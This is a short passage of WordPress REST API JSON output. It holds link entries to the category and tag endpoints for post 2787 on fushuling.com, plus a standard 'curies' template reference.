p\/wp-json\/wp\/v2\/categories?post=2787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}